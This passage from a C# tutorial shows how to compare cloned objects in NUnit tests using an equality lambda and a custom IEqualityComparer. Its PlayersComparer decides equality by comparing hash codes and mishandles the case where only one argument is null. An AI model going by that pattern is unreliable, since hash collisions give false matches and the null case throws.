    This approach works pretty fine unless you want to check values on complex types with no equality checks.

    public class Player
    {
      public int Id { get; set; }
      public string UserName { get; set; }
      public int Score { get; set; }
    }
    

    Let’s create a dummy method that clones a player:

    public static Player GetClone(Player source)
      => new Player
        {
          Id = source.Id,
          UserName = source.UserName,
          Score = source.Score
        };
    

    and call it this way:

    [Test]
    public void GetClone()
    {
      var originalPlayer = new Player { Id = 1, UserName = "me", Score = 1 };
    
      var clonedPlayer = MyUtils.GetClone(originalPlayer);
    
      Assert.That(clonedPlayer, Is.EqualTo(originalPlayer));
    }
    

    Even though logically originalPlayer and clonedPlayer are equal, they are not the same: the test will fail!

    Lucky for us, we can specify the comparison rules!

    Equality function: great for simple checks

    Say that we don’t want to check that all the values match. We only care about Id and UserName.

    When we have just a few fields to check, we can use a function to specify that two items are equal:

    [Test]
    public void GetClone_WithEqualityFunction()
    {
      var originalPlayer = new Player { Id = 1, UserName = "me", Score = 1 };
    
      var clonedPlayer = MyUtils.GetClone(originalPlayer);
    
      Assert.That(clonedPlayer, Is.EqualTo(originalPlayer).Using<Player>(
        (Player a, Player b) => a.Id == b.Id && a.UserName == b.UserName)
        );
    }
    

    Clearly, if the method becomes unreadable, you can refactor the comparer function as so:

    [Test]
    public void GetClone_WithEqualityFunction()
    {
      var originalPlayer = new Player { Id = 1, UserName = "me", Score = 1 };
    
      var clonedPlayer = MyUtils.GetClone(originalPlayer);
    
      Func<Player, Player, bool> comparer = (Player a, Player b) => a.Id == b.Id && a.UserName == b.UserName;
    
      Assert.That(clonedPlayer, Is.EqualTo(originalPlayer).Using<Player>(comparer));
    }
    

    EqualityComparer class: best for complex scenarios

    If you have a complex scenario to validate, you can create a custom class that implements the IEqualityComparer interface. Here, you have to implement two methods: Equals and GetHashCode.

    Instead of just implementing the same check inside the Equals method, we’re gonna try a different approach: we’re gonna use GetHashCode to determine how to identify a Player, by generating a string used as a simple identifier, and then we’re gonna use the HashCode of the result string for the actual comparison:

    public class PlayersComparer : IEqualityComparer<Player>
    {
        public bool Equals(Player? x, Player? y)
        {
            return
                (x is null && y is null)
                ||
                GetHashCode(x) == GetHashCode(y);
        }
    
        public int GetHashCode([DisallowNull] Player obj)
        {
            return $"{obj.Id}-{obj.UserName}".GetHashCode();
        }
    }
    

    Clearly, I’ve also added a check on nullability: (x is null && y is null).

    Now we can instantiate a new instance of PlayersComparer and use it to check whether two players are equivalent:

    [Test]
    public void GetClone_WithEqualityComparer()
    {
        var originalPlayer = new Player { Id = 1, UserName = "me", Score = 1 };
    
        var clonedPlayer = MyUtils.GetClone(originalPlayer);
    
        Assert.That(clonedPlayer, Is.EqualTo(originalPlayer).Using<Player>(new PlayersComparer()));
    }
    

    Of course, you can customize the Equals method to use whichever condition to validate the equivalence of two instances, depending on your business rules. For example, you can say that two vectors are equal if they have the exact same length and direction, even though the start and end points are different.

    ❓ A question for you: where would you put the equality check: in the production code or in the tests project?

    Wrapping up

    As we’ve learned in this article, there are smarter ways to check if two objects are equal than just comparing every field one by one.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or LinkedIn! 🤜🤛

    Happy coding!

    🐧





    Source link